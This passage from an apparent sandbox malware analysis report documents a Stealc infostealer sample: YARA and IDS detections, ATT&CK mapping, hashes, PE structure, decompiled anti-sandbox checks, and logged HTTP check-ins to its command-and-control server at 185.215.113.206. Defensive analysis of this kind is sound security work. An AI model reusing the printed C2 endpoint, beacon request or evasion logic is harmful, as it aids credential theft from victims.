                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009879E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_009879E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00987BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00987BC0

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.970000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2153163203.00000000053C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2241492320.00000000017FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5912, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.970000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2153163203.00000000053C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2241492320.00000000017FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5912, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts12
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem334
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe42%ReversingLabsWin32.Trojan.Generic
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://docs.rs/getrandom#nodejs-es-module-support0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.206/6c4adf523b719729.phptrue
                  		unknown
                  http://185.215.113.206/true
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.206kfile.exe, 00000000.00000002.2241492320.00000000017FE000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://185.215.113.206/6c4adf523b719729.phptfile.exe, 00000000.00000002.2241492320.00000000017FE000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://185.215.113.206/=cfile.exe, 00000000.00000002.2241492320.0000000001858000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://185.215.113.206/6c4adf523b719729.php/file.exe, 00000000.00000002.2241492320.0000000001858000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://185.215.113.206file.exe, 00000000.00000002.2241492320.00000000017FE000.00000004.00000020.00020000.00000000.sdmptrue
                              		unknown
                              http://185.215.113.206/6c4adf523b719729.phpYBfile.exe, 00000000.00000002.2241492320.0000000001869000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://185.215.113.206/wsfile.exe, 00000000.00000002.2241492320.0000000001858000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://185.215.113.206/Pcfile.exe, 00000000.00000002.2241492320.0000000001858000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://185.215.113.206/6c4adf523b719729.php1Bfile.exe, 00000000.00000002.2241492320.0000000001869000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://docs.rs/getrandom#nodejs-es-module-supportfile.exe, file.exe, 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2153163203.00000000053EB000.00000004.00001000.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      185.215.113.206
                                      		unknownPortugal
                                      		206894WHOLESALECONNECTIONSNLtrue

                                      General Information

                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1544173
                                      Start date and time:2024-10-28 23:47:08 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 5m 20s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:6
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:file.exe
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@1/0@0/1
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 79%
                                      • Number of executed functions: 19
                                      • Number of non-executed functions: 131
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe

                                      Warnings

                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • VT rate limit hit for: file.exe

                                      Simulations

                                      Behavior and APIs

                                      No simulations

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      185.215.113.206file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.206/6c4adf523b719729.php

                                      Domains

                                      No context

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaCBrowse
                                      • 185.215.113.16
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.206
                                      file.exeGet hashmaliciousLummaCBrowse
                                      • 185.215.113.16
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.206
                                      file.exeGet hashmaliciousLummaCBrowse
                                      • 185.215.113.16
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.206
                                      file.exeGet hashmaliciousLummaCBrowse
                                      • 185.215.113.16
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.206
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.206
                                      file.exeGet hashmaliciousLummaCBrowse
                                      • 185.215.113.16

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      No created / dropped files found

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.9623972805857175
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:file.exe
                                      File size:2'114'560 bytes
                                      MD5:ddaa0462b7b18caecc3dac2c4b87dd91
                                      SHA1:356ec8395b16445164e12c0b238f7fd1af7168bf
                                      SHA256:5026b4a52abc821ed17b10cbe59d4ec4c0a8131d1736dfb89d1e568abee5ab27
                                      SHA512:5a29fd2652cfafe187bc65bf78672d47b57724e7352f3a62080c6f190102198a251a65372465053ecfa39266902c6a4f496cd4fd130638d0455a872ee6f17516
                                      SSDEEP:49152:oQlj3CKeWHNWyFklofB6sICX2c8uioFkgJb:Vl2SNDFkUNX2c8uLFF
                                      TLSH:88A533144E02CC3EC56A66B50B87703A7F7D6E8461CFCB659183D25BAC22BF9C0D7A94
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...

                                      File Icon

                                      Icon Hash:00928e8e8686b000

                                      Static PE Info

                                      General

                                      Entrypoint:0xb24000
                                      Entrypoint Section:.taggant
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:1
                                      File Version Major:5
                                      File Version Minor:1
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:1
                                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                                      Entrypoint Preview

                                      Instruction
                                      jmp 00007FE478E065CAh

                                      Rich Headers

                                      Programming Language:
                                      • [C++] VS2010 build 30319
                                      • [ASM] VS2010 build 30319
                                      • [ C ] VS2010 build 30319
                                      • [ C ] VS2008 SP1 build 30729
                                      • [IMP] VS2008 SP1 build 30729
                                      • [LNK] VS2010 build 30319

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x2e90500x64.idata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e91f80x8.idata
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      0x10000x2e70000x67600b6cc732d2f2f27d5e4075e5f95f357a2unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc 0x2e80000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .idata 0x2e90000x10000x200049071433b9f7c843453337b0fd53002False0.1328125data0.8946074494647072IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      0x2ea0000x29f0000x2007ac162d0921a27e13cf3c7b57c9fe406unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      uwjugjop0x5890000x19a0000x199400dbb1cd181adc433e24cc1f22a8c111ccFalse0.9949328516340867data7.954930904416413IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      radqkvcl0x7230000x10000x40007f3d3a084a2d998e990c377aa2c7a3fFalse0.755859375data6.013278502620796IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .taggant0x7240000x30000x2200088a8e2c3b035fd998ea1baa7ac18b70False0.09731158088235294DOS executable (COM)1.0986259403937138IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                      Imports

                                      DLLImport
                                      kernel32.dlllstrcpy

                                      Network Behavior

                                      Suricata IDS Alerts

                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2024-10-28T23:48:09.074209+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.649711185.215.113.20680TCP

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Oct 28, 2024 23:48:07.874202013 CET4971180192.168.2.6185.215.113.206
                                      Oct 28, 2024 23:48:07.879586935 CET8049711185.215.113.206192.168.2.6
                                      Oct 28, 2024 23:48:07.879733086 CET4971180192.168.2.6185.215.113.206
                                      Oct 28, 2024 23:48:07.880403042 CET4971180192.168.2.6185.215.113.206
                                      Oct 28, 2024 23:48:07.886178017 CET8049711185.215.113.206192.168.2.6
                                      Oct 28, 2024 23:48:08.785053968 CET8049711185.215.113.206192.168.2.6
                                      Oct 28, 2024 23:48:08.785229921 CET4971180192.168.2.6185.215.113.206
                                      Oct 28, 2024 23:48:08.788475990 CET4971180192.168.2.6185.215.113.206
                                      Oct 28, 2024 23:48:08.793850899 CET8049711185.215.113.206192.168.2.6
                                      Oct 28, 2024 23:48:09.073993921 CET8049711185.215.113.206192.168.2.6
                                      Oct 28, 2024 23:48:09.074208975 CET4971180192.168.2.6185.215.113.206
                                      Oct 28, 2024 23:48:14.227246046 CET8049711185.215.113.206192.168.2.6
                                      Oct 28, 2024 23:48:14.227340937 CET4971180192.168.2.6185.215.113.206
                                      Oct 28, 2024 23:48:15.024122000 CET4971180192.168.2.6185.215.113.206

                                      HTTP Request Dependency Graph

                                      • 185.215.113.206

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.649711185.215.113.206805912C:\Users\user\Desktop\file.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 28, 2024 23:48:07.880403042 CET90OUTGET / HTTP/1.1
                                      Host: 185.215.113.206
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                      Oct 28, 2024 23:48:08.785053968 CET203INHTTP/1.1 200 OK
                                      Date: Mon, 28 Oct 2024 22:48:08 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Content-Length: 0
                                      Keep-Alive: timeout=5, max=100
                                      Connection: Keep-Alive
                                      Content-Type: text/html; charset=UTF-8
                                      Oct 28, 2024 23:48:08.788475990 CET413OUTPOST /6c4adf523b719729.php HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=----JECBGCFHCFIDHIDHDGDG
                                      Host: 185.215.113.206
                                      Content-Length: 211
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                      Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 34 37 30 33 31 41 44 44 34 31 45 32 36 34 33 30 39 35 39 34 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 2d 2d 0d 0a
                                      Data Ascii: ------JECBGCFHCFIDHIDHDGDGContent-Disposition: form-data; name="hwid"B47031ADD41E2643095942------JECBGCFHCFIDHIDHDGDGContent-Disposition: form-data; name="build"tale------JECBGCFHCFIDHIDHDGDG--
                                      Oct 28, 2024 23:48:09.073993921 CET210INHTTP/1.1 200 OK
                                      Date: Mon, 28 Oct 2024 22:48:08 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Content-Length: 8
                                      Keep-Alive: timeout=5, max=99
                                      Connection: Keep-Alive
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 59 6d 78 76 59 32 73 3d
                                      Data Ascii: YmxvY2s=


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:18:48:02
                                      Start date:28/10/2024
                                      Path:C:\Users\user\Desktop\file.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                      Imagebase:0x970000
                                      File size:2'114'560 bytes
                                      MD5 hash:DDAA0462B7B18CAECC3DAC2C4B87DD91
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2153163203.00000000053C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2241492320.00000000017FE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Disassembly

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:3%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:3.5%
                                        Total number of Nodes:1327
                                        Total number of Limit Nodes:24
                                        execution_graph 37329 986c90 37374 9722a0 37329->37374 37353 986d04 37354 98acc0 4 API calls 37353->37354 37355 986d0b 37354->37355 37356 98acc0 4 API calls 37355->37356 37357 986d12 37356->37357 37358 98acc0 4 API calls 37357->37358 37359 986d19 37358->37359 37360 98acc0 4 API calls 37359->37360 37361 986d20 37360->37361 37526 98abb0 37361->37526 37363 986dac 37530 986bc0 GetSystemTime 37363->37530 37365 986d29 37365->37363 37367 986d62 OpenEventA 37365->37367 37368 986d79 37367->37368 37369 986d95 CloseHandle Sleep 37367->37369 37373 986d81 CreateEventA 37368->37373 37371 986daa 37369->37371 37371->37365 37372 986db6 CloseHandle ExitProcess 37373->37363 37727 974610 37374->37727 37376 9722b4 37377 974610 2 API calls 37376->37377 37378 9722cd 37377->37378 37379 974610 2 API calls 37378->37379 37380 9722e6 37379->37380 37381 974610 2 API calls 37380->37381 37382 9722ff 37381->37382 37383 974610 2 API calls 37382->37383 37384 972318 37383->37384 37385 974610 2 API calls 37384->37385 37386 972331 37385->37386 37387 974610 2 API calls 37386->37387 37388 97234a 37387->37388 37389 974610 2 API calls 37388->37389 37390 972363 37389->37390 37391 974610 2 API calls 37390->37391 37392 97237c 37391->37392 37393 974610 2 API calls 37392->37393 37394 972395 37393->37394 37395 974610 2 API calls 37394->37395 37396 9723ae 37395->37396 37397 974610 2 API calls 37396->37397 37398 9723c7 37397->37398 37399 974610 2 API calls 37398->37399 37400 9723e0 37399->37400 37401 974610 2 API calls 37400->37401 37402 9723f9 37401->37402 37403 974610 2 API calls 37402->37403 37404 972412 37403->37404 37405 974610 2 API calls 37404->37405 37406 97242b 37405->37406 37407 974610 2 API calls 37406->37407 37408 972444 37407->37408 37409 974610 2 API calls 37408->37409 37410 97245d 37409->37410 37411 974610 2 API calls 37410->37411 37412 972476 37411->37412 37413 974610 2 API calls 37412->37413 37414 97248f 37413->37414 37415 974610 2 API calls 37414->37415 37416 9724a8 37415->37416 37417 974610 2 API calls 37416->37417 37418 9724c1 37417->37418 37419 974610 2 API calls 37418->37419 37420 9724da 37419->37420 37421 974610 2 API calls 37420->37421 37422 9724f3 37421->37422 37423 974610 2 API calls 37422->37423 37424 97250c 37423->37424 37425 974610 2 API calls 37424->37425 37426 972525 37425->37426 37427 974610 2 API calls 37426->37427 37428 97253e 37427->37428 37429 974610 2 API calls 37428->37429 37430 972557 37429->37430 37431 974610 2 API calls 37430->37431 37432 972570 37431->37432 37433 974610 2 API calls 37432->37433 37434 972589 37433->37434 37435 974610 2 API calls 37434->37435 37436 9725a2 37435->37436 37437 974610 2 API calls 37436->37437 37438 9725bb 37437->37438 37439 974610 2 API calls 37438->37439 37440 9725d4 37439->37440 37441 974610 2 API calls 37440->37441 37442 9725ed 37441->37442 37443 974610 2 API calls 37442->37443 37444 972606 37443->37444 37445 974610 2 API calls 37444->37445 37446 97261f 37445->37446 37447 974610 2 API calls 37446->37447 37448 972638 37447->37448 37449 974610 2 API calls 37448->37449 37450 972651 37449->37450 37451 974610 2 API calls 37450->37451 37452 97266a 37451->37452 37453 974610 2 API calls 37452->37453 37454 972683 37453->37454 37455 974610 2 API calls 37454->37455 37456 97269c 37455->37456 37457 974610 2 API calls 37456->37457 37458 9726b5 37457->37458 37459 974610 2 API calls 37458->37459 37460 9726ce 37459->37460 37461 989bb0 37460->37461 37732 989aa0 GetPEB 37461->37732 37463 989bb8 37464 989de3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 37463->37464 37467 989bca 37463->37467 37465 989e5d 37464->37465 37466 989e44 GetProcAddress 37464->37466 37468 989e96 37465->37468 37469 989e66 GetProcAddress GetProcAddress 37465->37469 37466->37465 37470 989bdc 21 API calls 37467->37470 37471 989eb8 37468->37471 37472 989e9f GetProcAddress 37468->37472 37469->37468 37470->37464 37473 989ed9 37471->37473 37474 989ec1 GetProcAddress 37471->37474 37472->37471 37475 986ca0 37473->37475 37476 989ee2 GetProcAddress GetProcAddress 37473->37476 37474->37473 37477 98aa50 37475->37477 37476->37475 37478 98aa60 37477->37478 37479 986cad 37478->37479 37480 98aa8e lstrcpy 37478->37480 37481 9711d0 37479->37481 37480->37479 37482 9711e8 37481->37482 37483 971217 37482->37483 37484 97120f ExitProcess 37482->37484 37485 971160 GetSystemInfo 37483->37485 37486 971184 37485->37486 37487 97117c ExitProcess 37485->37487 37488 971110 GetCurrentProcess VirtualAllocExNuma 37486->37488 37489 971141 ExitProcess 37488->37489 37490 971149 37488->37490 37733 9710a0 VirtualAlloc 37490->37733 37493 971220 37737 988b40 37493->37737 37496 971249 __aulldiv 37497 97129a 37496->37497 37498 971292 ExitProcess 37496->37498 37499 986a10 GetUserDefaultLangID 37497->37499 37500 986a32 37499->37500 37501 986a73 37499->37501 37500->37501 37502 986a6b ExitProcess 37500->37502 37503 986a4d ExitProcess 37500->37503 37504 986a61 ExitProcess 37500->37504 37505 986a43 ExitProcess 37500->37505 37506 986a57 ExitProcess 37500->37506 37507 971190 37501->37507 37508 987a70 3 API calls 37507->37508 37510 97119e 37508->37510 37509 9711cc 37514 9879e0 GetProcessHeap RtlAllocateHeap GetUserNameA 37509->37514 37510->37509 37511 9879e0 3 API calls 37510->37511 37512 9711b7 37511->37512 37512->37509 37513 9711c4 ExitProcess 37512->37513 37515 986cd0 37514->37515 37516 987a70 GetProcessHeap RtlAllocateHeap GetComputerNameA 37515->37516 37517 986ce3 37516->37517 37518 98acc0 37517->37518 37739 98aa20 37518->37739 37520 98acd1 lstrlen 37522 98acf0 37520->37522 37521 98ad28 37740 98aab0 37521->37740 37522->37521 37524 98ad0a lstrcpy lstrcat 37522->37524 37524->37521 37525 98ad34 37525->37353 37527 98abcb 37526->37527 37528 98ac1b 37527->37528 37529 98ac09 lstrcpy 37527->37529 37528->37365 37529->37528 37744 986ac0 37530->37744 37532 986c2e 37533 986c38 sscanf 37532->37533 37773 98ab10 37533->37773 37535 986c4a SystemTimeToFileTime SystemTimeToFileTime 37536 986c6e 37535->37536 37537 986c80 37535->37537 37536->37537 37538 986c78 ExitProcess 37536->37538 37539 985d60 37537->37539 37540 985d6d 37539->37540 37541 98aa50 lstrcpy 37540->37541 37542 985d7e 37541->37542 37775 98ab30 lstrlen 37542->37775 37545 98ab30 2 API calls 37546 985db4 37545->37546 37547 98ab30 2 API calls 37546->37547 37548 985dc4 37547->37548 37779 986680 37548->37779 37551 98ab30 2 API calls 37552 985de3 37551->37552 37553 98ab30 2 API calls 37552->37553 37554 985df0 37553->37554 37555 98ab30 2 API calls 37554->37555 37556 985dfd 37555->37556 37557 98ab30 2 API calls 37556->37557 37558 985e49 37557->37558 37788 9726f0 37558->37788 37566 985f13 37567 986680 lstrcpy 37566->37567 37568 985f25 37567->37568 37569 98aab0 lstrcpy 37568->37569 37570 985f42 37569->37570 37571 98acc0 4 API calls 37570->37571 37572 985f5a 37571->37572 37573 98abb0 lstrcpy 37572->37573 37574 985f66 37573->37574 37575 98acc0 4 API calls 37574->37575 37576 985f8a 37575->37576 37577 98abb0 lstrcpy 37576->37577 37578 985f96 37577->37578 37579 98acc0 4 API calls 37578->37579 37580 985fba 37579->37580 37581 98abb0 lstrcpy 37580->37581 37582 985fc6 37581->37582 37583 98aa50 lstrcpy 37582->37583 37584 985fee 37583->37584 38514 987690 GetWindowsDirectoryA 37584->38514 37587 98aab0 lstrcpy 37588 986008 37587->37588 38524 9748d0 37588->38524 37590 98600e 38669 9819f0 37590->38669 37592 986016 37593 